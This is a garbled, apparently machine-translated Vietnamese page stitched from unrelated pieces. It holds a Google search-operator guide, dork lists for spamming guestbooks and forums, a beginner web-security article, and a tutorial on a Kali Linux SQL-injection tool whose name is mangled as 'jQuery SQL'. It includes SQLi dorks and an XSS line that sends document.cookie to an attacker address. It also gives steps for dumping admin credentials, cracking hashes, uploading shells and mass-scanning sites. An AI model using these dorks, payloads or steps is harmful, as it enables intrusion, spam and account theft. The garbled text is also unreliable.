Hướng dẫn sử dụng jQuery SQL, công cụ đa chức năng để tìm và khai thác SQL SQL trong Kali Linux. Hướng dẫn sử dụng jQuery SQL - công cụ đa chức năng tìm kiếm và khai thác SQL SQL trong Kali Linux Pl

Cách tìm kiếm chính xác bằng google.com

Chắc hẳn mọi người đều biết cách sử dụng công cụ tìm kiếm như Google =) Nhưng không phải ai cũng biết rằng nếu bạn soạn chính xác truy vấn tìm kiếm bằng cách sử dụng các cấu trúc đặc biệt, bạn có thể đạt được kết quả mà bạn đang tìm kiếm hiệu quả và nhanh chóng hơn nhiều =) Trong bài viết này Mình sẽ cố gắng chỉ ra điều đó và những gì bạn cần làm để tìm kiếm chính xác

Google hỗ trợ một số toán tử tìm kiếm nâng cao có ý nghĩa đặc biệt khi tìm kiếm trên google.com. Thông thường, những câu lệnh này sẽ thay đổi kết quả tìm kiếm hoặc thậm chí yêu cầu Google thực hiện các loại tìm kiếm hoàn toàn khác nhau. Ví dụ: cấu trúc link: là một toán tử đặc biệt và yêu cầu liên kết: www.google.com sẽ không cung cấp cho bạn tìm kiếm thông thường mà thay vào đó sẽ tìm thấy tất cả các trang web có liên kết đến google.com.
các loại yêu cầu thay thế

bộ đệm: Nếu bạn bao gồm các từ khác trong truy vấn, Google sẽ đánh dấu những từ được bao gồm đó trong tài liệu được lưu trong bộ nhớ đệm.
Ví dụ, bộ đệm: www.trang web sẽ hiển thị nội dung được lưu trong bộ nhớ cache với từ "web" được tô sáng.

liên kết: Truy vấn tìm kiếm ở trên sẽ hiển thị các trang web có chứa liên kết đến truy vấn được chỉ định.
Ví dụ: liên kết: www.site sẽ hiển thị tất cả các trang có liên kết đến http://www.site

liên quan: Hiển thị các trang web “có liên quan” đến trang web được chỉ định.
Ví dụ, có liên quan: www.google.com sẽ liệt kê các trang web giống với trang chủ của Google.

thông tin: Thông tin yêu cầu: sẽ trình bày một số thông tin mà Google có về trang web bạn đang yêu cầu.
Ví dụ, thông tin:trang web sẽ hiển thị thông tin về diễn đàn của chúng tôi =) (Armada - Diễn đàn quản trị trang web dành cho người lớn).

Yêu cầu thông tin khác

định nghĩa: Truy vấn định nghĩa: sẽ cung cấp định nghĩa cho các từ bạn nhập sau nó, được thu thập từ nhiều nguồn trực tuyến khác nhau. Định nghĩa sẽ dành cho toàn bộ cụm từ đã nhập (nghĩa là nó sẽ bao gồm tất cả các từ trong truy vấn chính xác).

cổ phiếu: Nếu bạn bắt đầu truy vấn bằng cổ phiếu: Google sẽ xử lý phần còn lại của cụm từ truy vấn dưới dạng ký hiệu cổ phiếu và liên kết đến trang hiển thị thông tin được tạo sẵn cho các ký hiệu này.
Ví dụ, cổ phiếu: Intel yahoo sẽ hiển thị thông tin về Intel và Yahoo. (Lưu ý nên gõ ký hiệu tin nóng chứ không phải tên công ty)

Công cụ sửa đổi truy vấn

site: Nếu bạn bao gồm site: trong truy vấn của mình, Google sẽ giới hạn kết quả ở những trang web mà nó tìm thấy trong miền đó.
Bạn cũng có thể tìm kiếm theo vùng riêng lẻ, chẳng hạn như ru, org, com, v.v. ( trang web: com trang web:ru)

allintitle: Nếu bạn chạy truy vấn với allintitle:, Google sẽ giới hạn kết quả ở tất cả các từ truy vấn trong tiêu đề.
Ví dụ, allintitle: tìm kiếm google sẽ trả về tất cả các trang Google bằng cách tìm kiếm như hình ảnh, Blog, v.v.

intitle: Nếu bạn bao gồm intitle: trong truy vấn của mình, Google sẽ giới hạn kết quả ở những tài liệu có chứa từ đó trong tiêu đề.
Ví dụ, intitle:Kinh doanh

allinurl: Nếu bạn chạy truy vấn bằng allinurl: Google sẽ giới hạn kết quả cho tất cả các từ truy vấn trong URL.
Ví dụ, allinurl: tìm kiếm trên google sẽ trả lại tài liệu bằng google và tìm kiếm trong tiêu đề. Ngoài ra, như một tùy chọn, bạn có thể phân tách các từ bằng dấu gạch chéo (/), sau đó các từ ở cả hai bên dấu gạch chéo sẽ được tìm kiếm trong cùng một trang: Ví dụ allinurl: foo/bar

inurl: Nếu bạn bao gồm inurl: trong truy vấn của mình, Google sẽ giới hạn kết quả ở những tài liệu có chứa từ đó trong URL.
Ví dụ, Hoạt ảnh inurl:trang web

intext: chỉ tìm kiếm từ được chỉ định trong văn bản trang, bỏ qua văn bản tiêu đề và liên kết cũng như những thứ khác không liên quan. Ngoài ra còn có một dẫn xuất của công cụ sửa đổi này - allintext: tức là. hơn nữa, tất cả các từ trong truy vấn sẽ chỉ được tìm kiếm trong văn bản, điều này cũng có thể quan trọng, bỏ qua các từ được sử dụng thường xuyên trong các liên kết
Ví dụ, văn bản: diễn đàn

phạm vi ngày: tìm kiếm trong khung thời gian (dải ngày: 2452389-2452389), ngày tháng ở định dạng Julian.

Vâng, và tất cả các loại ví dụ thú vị về truy vấn

Ví dụ về viết truy vấn cho Google. Dành cho người gửi thư rác

Inurl:control.guest?a=sign

Trang web:books.dreambook.com “URL trang chủ” “Đăng ký của tôi” inurl:sign

Trang web: www.freegb.net Trang chủ

Inurl:sign.asp “Số ký tự”

“Tin nhắn:” inurl:sign.cfm “Người gửi:”

Inurl:register.php “Đăng ký người dùng” “Trang web”

Inurl:edu/guestbook “Ký vào sổ lưu bút”

Inurl:post “Đăng bình luận” “URL”

Inurl:/archives/ “Nhận xét:” “Ghi nhớ thông tin?”

“Kịch bản và Sổ lưu bút được tạo bởi:” “URL:” “Nhận xét:”

Inurl:?action=add “phpBook” “URL”

Intitle:"Gửi câu chuyện mới"

Tạp chí thời sự

Inurl:www.livejournal.com/users/ mode=reply

Inurliestjournal.com/ mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? "Sổ khách"

Blog

Inurl:blogger.com/comment.g?”postID””ẩn danh”

Inurl:typepad.com/ “Đăng bình luận” “Ghi nhớ thông tin cá nhân?”

Inurl:greatestjournal.com/community/ “Đăng bình luận” “địa chỉ của những người đăng ẩn danh”

“Đăng bình luận” “địa chỉ của người đăng ẩn danh” -

Intitle:"Đăng bình luận"

Inurl:pirillo.com “Đăng bình luận”

Diễn đàn

Inurl:gate.html?”name=Diễn đàn” “mode=reply”

Inurl:”forum/posting.php?mode=reply”

Inurl: "mes.php?"

Inurl:”thành viên.html”

Inurl: diễn đàn/memberlist.php?”

Tôi quyết định nói một chút về bảo mật thông tin. Bài viết sẽ hữu ích cho những lập trình viên mới làm quen và những người mới bắt đầu tham gia phát triển Frontend. Vấn đề là gì?

Nhiều nhà phát triển mới vào nghề quá say mê viết mã đến nỗi họ hoàn toàn quên mất tính bảo mật trong công việc của mình. Và quan trọng nhất, họ quên mất những lỗ hổng như truy vấn SQL và XXS. Họ cũng nghĩ ra những mật khẩu dễ dàng cho bảng quản trị của mình và phải chịu sự tấn công tàn bạo. Những cuộc tấn công này là gì và làm thế nào bạn có thể tránh chúng?

SQL tiêm

SQL SQL là kiểu tấn công phổ biến nhất vào cơ sở dữ liệu, được thực hiện trong quá trình truy vấn SQL cho một DBMS cụ thể. Nhiều người và thậm chí cả các công ty lớn phải hứng chịu những cuộc tấn công như vậy. Lý do là lỗi của nhà phát triển khi viết cơ sở dữ liệu và nói đúng hơn là các truy vấn SQL.

Một cuộc tấn công SQL SQL có thể xảy ra do việc xử lý dữ liệu đầu vào được sử dụng trong các truy vấn SQL không chính xác. Nếu cuộc tấn công của hacker thành công, bạn có nguy cơ mất không chỉ nội dung của cơ sở dữ liệu mà còn cả mật khẩu và nhật ký bảng quản trị. Và dữ liệu này sẽ khá đủ để tiếp quản hoàn toàn trang web hoặc thực hiện các điều chỉnh không thể đảo ngược đối với nó.

Cuộc tấn công có thể được tái tạo thành công bằng các tập lệnh viết bằng PHP, ASP, Perl và các ngôn ngữ khác. Sự thành công của các cuộc tấn công như vậy phụ thuộc nhiều hơn vào DBMS được sử dụng và cách triển khai tập lệnh. Có rất nhiều trang web dễ bị tấn công SQL trên thế giới. Điều này rất dễ dàng để xác minh. Chỉ cần nhập “dorks” - đây là những truy vấn đặc biệt để tìm kiếm các trang web dễ bị tấn công. Dưới đây là một số trong số họ:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

Làm thế nào để sử dụng chúng? Chỉ cần nhập chúng vào công cụ tìm kiếm Google hoặc Yandex. Công cụ tìm kiếm sẽ cung cấp cho bạn không chỉ một trang web dễ bị tấn công mà còn cung cấp cho bạn một trang về lỗ hổng này. Nhưng chúng tôi sẽ không dừng lại ở đó và đảm bảo rằng trang này thực sự dễ bị tấn công. Để làm điều này, chỉ cần đặt một dấu ngoặc kép “‘ sau giá trị “id=1”. Một cái gì đó như thế này:

  • inurl:games.php?id=1’

Và trang web sẽ báo lỗi cho chúng ta về truy vấn SQL. Hacker của chúng ta cần gì tiếp theo?

Và sau đó anh ta cần chính liên kết này đến trang lỗi. Sau đó, công việc xử lý lỗ hổng trong hầu hết các trường hợp diễn ra trong bản phân phối "Kali linux" với các tiện ích dành cho phần này: giới thiệu mã tiêm và thực hiện các thao tác cần thiết. Điều này sẽ xảy ra như thế nào, tôi không thể nói cho bạn biết. Nhưng bạn có thể tìm thấy thông tin về điều này trên Internet.

Tấn công XSS

Kiểu tấn công này được thực hiện trên các tệp Cookies. Ngược lại, người dùng thích lưu chúng. Tại sao không? Chúng ta sẽ làm gì nếu không có họ? Rốt cuộc, nhờ có Cookies, chúng ta không phải nhập mật khẩu Vk.com hoặc Mail.ru hàng trăm lần. Và có rất ít người từ chối chúng. Nhưng trên Internet, một quy luật thường xuất hiện đối với hacker: hệ số tiện lợi tỉ lệ thuận với hệ số bất an.

Để thực hiện một cuộc tấn công XSS, hacker của chúng tôi cần có kiến ​​thức về JavaScript. Thoạt nhìn, ngôn ngữ này rất đơn giản và vô hại vì nó không có quyền truy cập vào tài nguyên máy tính. Một hacker chỉ có thể làm việc với JavaScript trên trình duyệt, nhưng thế là đủ. Rốt cuộc, việc chính là nhập mã vào trang web.

Tôi sẽ không nói chi tiết về quá trình tấn công. Tôi sẽ chỉ cho bạn biết những điều cơ bản và ý nghĩa của việc điều này xảy ra như thế nào.

Một hacker có thể thêm mã JS vào một số diễn đàn hoặc sổ khách:

document.location.href =”http://192.168.1.7/sniff.php?test”

Các tập lệnh sẽ chuyển hướng chúng ta đến trang bị nhiễm, nơi mã sẽ được thực thi: có thể là trình thám thính, một loại lưu trữ nào đó hoặc một công cụ khai thác, bằng cách nào đó sẽ đánh cắp Cookie của chúng tôi khỏi bộ đệm.

Tại sao lại là JavaScript? Bởi vì JavaScript rất giỏi trong việc xử lý các yêu cầu web và có quyền truy cập vào Cookie. Nhưng nếu tập lệnh của chúng tôi đưa chúng tôi đến một trang web nào đó, người dùng sẽ dễ dàng nhận thấy nó. Ở đây, hacker sử dụng một tùy chọn xảo quyệt hơn - hắn chỉ cần nhập mã vào hình ảnh.

Img=Hình ảnh mới();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

Chúng tôi chỉ cần tạo một hình ảnh và gán tập lệnh của mình cho nó làm địa chỉ.

Làm thế nào để bảo vệ bản thân khỏi tất cả điều này? Rất đơn giản - không nhấp vào các liên kết đáng ngờ.

Tấn công DoS và DDos

DoS (từ Từ chối dịch vụ bằng tiếng Anh - từ chối dịch vụ) là một cuộc tấn công của hacker vào hệ thống máy tính với mục tiêu khiến nó bị lỗi. Đây là việc tạo ra các điều kiện mà theo đó người dùng hệ thống thực sự không thể truy cập vào tài nguyên hệ thống (máy chủ) được cung cấp hoặc việc truy cập này rất khó khăn. Lỗi hệ thống cũng có thể là một bước tiến tới việc tiếp quản nếu trong tình huống khẩn cấp, phần mềm tạo ra bất kỳ thông tin quan trọng nào: ví dụ: phiên bản, một phần mã chương trình, v.v. Nhưng thông thường đây là thước đo áp lực kinh tế: mất đi một dịch vụ đơn giản tạo ra thu nhập. Các hóa đơn từ nhà cung cấp hoặc các biện pháp để tránh một cuộc tấn công đã đánh trúng đáng kể vào “mục tiêu” trong túi. Hiện tại, các cuộc tấn công DoS và DDoS là phổ biến nhất, vì chúng cho phép hầu hết mọi hệ thống bị lỗi mà không để lại bằng chứng quan trọng về mặt pháp lý.

Sự khác biệt giữa tấn công DoS và DDos là gì?

DoS là một cuộc tấn công được thiết kế một cách thông minh. Ví dụ: nếu máy chủ không kiểm tra tính chính xác của các gói đến, thì tin tặc có thể đưa ra một yêu cầu sẽ mất nhiều thời gian để xử lý và sẽ không có đủ thời gian xử lý để làm việc với các kết nối khác. Theo đó, khách hàng sẽ bị từ chối dịch vụ. Nhưng sẽ không thể làm quá tải hoặc vô hiệu hóa các trang web lớn nổi tiếng theo cách này. Họ được trang bị các kênh khá rộng và máy chủ siêu mạnh có thể đối phó với tình trạng quá tải như vậy mà không gặp vấn đề gì.

DDoS thực sự là cuộc tấn công tương tự như DoS. Nhưng nếu trong DoS có một gói yêu cầu thì trong DDoS có thể có hàng trăm gói yêu cầu trở lên. Ngay cả những máy chủ siêu mạnh cũng có thể không thể đối phó được với tình trạng quá tải như vậy. Tôi sẽ cho bạn một ví dụ.

Một cuộc tấn công DoS là khi bạn đang trò chuyện với ai đó, nhưng sau đó một người không lịch sự nào đó bước đến và bắt đầu la hét ầm ĩ. Việc nói chuyện là không thể hoặc rất khó khăn. Giải pháp: gọi cho bảo vệ, người sẽ bình tĩnh và đưa người đó ra khỏi cơ sở. Các cuộc tấn công DDoS là khi một đám đông hàng ngàn người có thái độ xấu như vậy lao vào. Trong trường hợp này, an ninh sẽ không thể trói mọi người và đưa họ đi.

DoS và DDoS được thực hiện từ máy tính, còn được gọi là zombie. Đây là những máy tính của người dùng bị tin tặc tấn công thậm chí không nghi ngờ rằng máy của họ đang tham gia vào một cuộc tấn công vào bất kỳ máy chủ nào.

Làm thế nào để bảo vệ bản thân khỏi điều này? Nói chung là không được. Nhưng bạn có thể khiến mọi việc trở nên khó khăn hơn đối với hacker. Để làm được điều này, bạn cần chọn một hosting tốt với máy chủ mạnh mẽ.

Tấn công Bruteforce

Một nhà phát triển có thể đưa ra rất nhiều hệ thống bảo vệ tấn công, xem xét đầy đủ các tập lệnh chúng tôi đã viết, kiểm tra trang web để tìm lỗ hổng, v.v. Nhưng khi đến bước cuối cùng của việc bố trí trang web, cụ thể là khi anh ấy chỉ đặt mật khẩu cho bảng quản trị, anh ấy có thể quên mất một điều. Mật khẩu!

Tuyệt đối không nên đặt mật khẩu đơn giản. Đây có thể là 12345, 1114457, vasya111, v.v. Không nên đặt mật khẩu dài dưới 10-11 ký tự. Nếu không, bạn có thể phải hứng chịu cuộc tấn công phổ biến và không phức tạp nhất - Brute Force.

Brute Force là một cuộc tấn công tìm kiếm mật khẩu từ điển bằng các chương trình đặc biệt. Từ điển có thể khác nhau: tiếng Latinh, liệt kê theo số, chẳng hạn như trong một phạm vi nhất định, hỗn hợp (tiếng Latin + số) và thậm chí có những từ điển có các ký tự duy nhất @#4$%&*~~`'”\ ? vân vân.

Tất nhiên, kiểu tấn công này rất dễ tránh, tất cả những gì bạn cần làm là nghĩ ra một mật khẩu phức tạp. Ngay cả một hình ảnh xác thực cũng có thể cứu bạn. Ngoài ra, nếu trang web của bạn được tạo trên CMS thì nhiều người trong số họ sẽ phát hiện kiểu tấn công này và chặn IP. Bạn phải luôn nhớ rằng mật khẩu càng có nhiều ký tự khác nhau thì càng khó đoán.

Hacker hoạt động như thế nào? Trong hầu hết các trường hợp, họ nghi ngờ hoặc biết trước một phần mật khẩu. Khá hợp lý khi cho rằng mật khẩu của người dùng chắc chắn sẽ không bao gồm 3 hoặc 5 ký tự. Những mật khẩu như vậy dẫn đến việc bị hack thường xuyên. Về cơ bản, tin tặc lấy khoảng từ 5 đến 10 ký tự và thêm một số ký tự mà chúng có thể biết trước. Tiếp theo, mật khẩu có phạm vi bắt buộc sẽ được tạo. Bản phân phối Kali Linux thậm chí còn có các chương trình dành cho những trường hợp như vậy. Và thì đấy, cuộc tấn công sẽ không còn kéo dài nữa vì khối lượng từ điển không còn quá lớn nữa. Ngoài ra, hacker có thể sử dụng sức mạnh của card màn hình. Một số trong số chúng hỗ trợ hệ thống CUDA và tốc độ tìm kiếm tăng tới 10 lần. Và bây giờ chúng ta thấy rằng một cuộc tấn công theo cách đơn giản như vậy là hoàn toàn có thật. Nhưng không chỉ các trang web phải chịu sự tấn công mạnh mẽ.

Kính gửi các nhà phát triển, đừng bao giờ quên hệ thống bảo mật thông tin, bởi vì ngày nay nhiều người, bao gồm cả các quốc gia, phải hứng chịu những kiểu tấn công như vậy. Suy cho cùng, điểm yếu lớn nhất là một người luôn có thể bị phân tâm ở đâu đó hoặc bỏ lỡ điều gì đó. Chúng ta là những lập trình viên, nhưng không phải những cỗ máy được lập trình. Hãy luôn cảnh giác, vì việc mất thông tin có thể gây ra hậu quả nghiêm trọng!

Chạy file đã tải xuống bằng cách nhấp đúp (bạn cần có máy ảo).

3. Ẩn danh khi kiểm tra trang web có bị chèn SQL không
Thiết lập Tor và Privoxy trong Kali Linux

[Phần đang được phát triển]

Thiết lập Tor và Privoxy trên Windows

[Phần đang được phát triển]

Cài đặt proxy trong jQuery SQL

[Phần đang được phát triển]

4. Kiểm tra trang web có bị chèn SQL bằng jQuery không

Làm việc với chương trình cực kỳ đơn giản. Chỉ cần nhập địa chỉ trang web và nhấn ENTER.

Ảnh chụp màn hình sau đây cho thấy trang web dễ bị tấn công bởi ba kiểu chèn SQL (thông tin về chúng được nêu ở góc dưới bên phải). Bằng cách nhấp vào tên của các mũi tiêm, bạn có thể chuyển đổi phương pháp được sử dụng:

Ngoài ra, cơ sở dữ liệu hiện có đã được hiển thị cho chúng tôi.

Bạn có thể xem nội dung của mỗi bảng:

Thông thường, điều thú vị nhất về bảng là thông tin xác thực của quản trị viên.

Nếu bạn may mắn tìm thấy dữ liệu của quản trị viên thì còn quá sớm để vui mừng. Bạn vẫn cần tìm bảng quản trị để nhập dữ liệu này.

5. Tìm kiếm bảng quản trị bằng jQuery SQL

Để thực hiện việc này, hãy chuyển đến tab tiếp theo. Ở đây chúng tôi được chào đón với một danh sách các địa chỉ có thể. Bạn có thể chọn một hoặc nhiều trang để kiểm tra:

Sự tiện lợi nằm ở chỗ bạn không cần phải sử dụng các chương trình khác.

Thật không may, không có nhiều lập trình viên bất cẩn lưu trữ mật khẩu ở dạng văn bản rõ ràng. Khá thường xuyên trong dòng mật khẩu chúng ta thấy một cái gì đó như

8743b52063cd84097a65d1633f5c74f5

Đây là một hàm băm. Bạn có thể giải mã nó bằng cách sử dụng vũ lực. Và... jQuery Tiêm có một tính năng mạnh mẽ được tích hợp sẵn.

6. Băm mạnh mẽ bằng cách sử dụng jQuery SQL

Sự tiện lợi chắc chắn là bạn không cần phải tìm kiếm các chương trình khác. Có hỗ trợ cho nhiều hàm băm phổ biến nhất.

Đây không phải là lựa chọn tốt nhất. Để trở thành bậc thầy trong việc giải mã hàm băm, bạn nên sử dụng Sách “” bằng tiếng Nga.

Tuy nhiên, tất nhiên, khi không có chương trình nào khác hoặc không có thời gian để nghiên cứu, jQuery Tiêm với chức năng brute Force được tích hợp sẵn sẽ rất hữu ích.

Có các cài đặt: bạn có thể đặt ký tự nào được bao gồm trong mật khẩu, phạm vi độ dài mật khẩu.

7. Thao tác với file sau khi phát hiện SQL SQL

Ngoài các thao tác với cơ sở dữ liệu - đọc và sửa đổi chúng, nếu phát hiện thấy việc tiêm SQL, các thao tác tệp sau có thể được thực hiện:

  • đọc tập tin trên máy chủ
  • tải tập tin mới lên máy chủ
  • tải shell lên máy chủ

Và tất cả điều này được triển khai trong jQuery Tiêm!

Có những hạn chế - máy chủ SQL phải có đặc quyền về tệp. Quản trị viên hệ thống thông minh đã vô hiệu hóa chúng và sẽ không thể truy cập vào hệ thống tệp.

Việc kiểm tra sự hiện diện của các đặc quyền tập tin khá đơn giản. Chuyển đến một trong các tab (đọc tệp, tạo shell, tải tệp mới lên) và thử thực hiện một trong các thao tác đã chỉ định.

Một lưu ý rất quan trọng khác - chúng ta cần biết đường dẫn tuyệt đối chính xác đến tệp mà chúng ta sẽ làm việc - nếu không sẽ không có gì hoạt động.

Nhìn vào ảnh chụp màn hình sau:

Đối với bất kỳ nỗ lực nào để thao tác trên một tệp, chúng tôi được trả lời: Không có đặc quyền TẬP TIN (không có đặc quyền tệp). Và không thể làm được gì ở đây.

Thay vào đó, nếu bạn gặp một lỗi khác:

Sự cố khi ghi vào [directory_name]

Điều này có nghĩa là bạn đã chỉ định sai đường dẫn tuyệt đối nơi bạn muốn ghi tệp.

Để đoán đường dẫn tuyệt đối, ít nhất bạn cần biết hệ điều hành mà máy chủ đang chạy. Để thực hiện việc này, hãy chuyển sang tab Mạng.

Mục này (dòng Win64) cho chúng tôi lý do để cho rằng chúng tôi đang xử lý hệ điều hành Windows:

Keep-Alive: timeout=5, max=99 Máy chủ: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Kết nối: Phương thức Keep-Alive: HTTP/1.1 200 OK Độ dài nội dung: 353 Ngày: Thứ Sáu, ngày 11 tháng 12 năm 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Loại nội dung: text/html; bộ ký tự=UTF-8

Ở đây chúng tôi có một số Unix (*BSD, Linux):

Mã hóa chuyển: chunked Ngày: Thứ Sáu, ngày 11 tháng 12 năm 2015 11:57:02 GMT Phương thức: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Kết nối: keep-alive Loại nội dung: text/html X- Được cung cấp bởi: PHP/5.3.29 Máy chủ: Apache/2.2.31 (Unix)

Và ở đây chúng ta có CentOS:

Phương thức: HTTP/1.1 200 OK Hết hạn: Thứ năm, ngày 19 tháng 11 năm 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Kết nối: keep-alive X-Cache-Lookup: MISS từ t1.hoster.ru:6666 Máy chủ: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS từ t1.hoster.ru Kiểm soát bộ đệm: không lưu trữ, không có bộ đệm, phải xác nhận lại, post-check=0, pre-check=0 Pragma: không có bộ đệm Ngày: Thứ Sáu, ngày 11 tháng 12 năm 2015 12:08:54 GMT Mã hóa chuyển: chunked Content-Type: text/html; bộ ký tự=WINDOWS-1251

Trên Windows, thư mục điển hình cho các trang web là C:\Server\data\htdocs\ . Nhưng trên thực tế, nếu ai đó “nghĩ đến” việc tạo một máy chủ trên Windows thì rất có thể người này chưa nghe nói gì về đặc quyền. Vì vậy, bạn nên bắt đầu thử trực tiếp từ thư mục C:/Windows/:

Như bạn có thể thấy, mọi thứ đều ổn trong lần đầu tiên.

Nhưng bản thân các shell của jQuery SQL đã làm tôi nghi ngờ. Nếu bạn có đặc quyền về tệp thì bạn có thể dễ dàng tải lên nội dung nào đó bằng giao diện web.

8. Kiểm tra hàng loạt các trang web để tìm kiếm SQL

Và thậm chí chức năng này còn có sẵn trong jQuery Tiêm. Mọi thứ cực kỳ đơn giản - tải xuống danh sách các trang web (có thể được nhập từ một tệp), chọn những trang bạn muốn kiểm tra và nhấp vào nút thích hợp để bắt đầu thao tác.

Kết luận từ việc tiêm SQL

jQuery Tiêm là một công cụ tốt, mạnh mẽ để tìm kiếm và sau đó sử dụng các nội dung SQL được tìm thấy trên các trang web. Ưu điểm không thể nghi ngờ của nó: dễ sử dụng, tích hợp sẵn các chức năng liên quan. jQuery Tiêm có thể là người bạn tốt nhất của người mới bắt đầu khi phân tích trang web.

Trong số những thiếu sót, tôi xin lưu ý rằng không thể chỉnh sửa cơ sở dữ liệu (ít nhất là tôi không tìm thấy chức năng này). Như với tất cả các công cụ GUI, một trong những nhược điểm của chương trình này có thể là do nó không thể sử dụng được trong các tập lệnh. Tuy nhiên, một số tự động hóa cũng có thể thực hiện được trong chương trình này - nhờ vào chức năng kiểm tra trang web hàng loạt được tích hợp sẵn.

Chương trình jQuery Tiêm thuận tiện hơn nhiều so với sqlmap. Nhưng sqlmap hỗ trợ nhiều kiểu chèn SQL hơn, có các tùy chọn để làm việc với tường lửa tệp và một số chức năng khác.

Tóm lại: jQuery SQL là người bạn tốt nhất của một hacker mới vào nghề.

Bạn có thể tìm thấy trợ giúp cho chương trình này trong Bách khoa toàn thư Kali Linux trên trang này: http://kali.tools/?p=706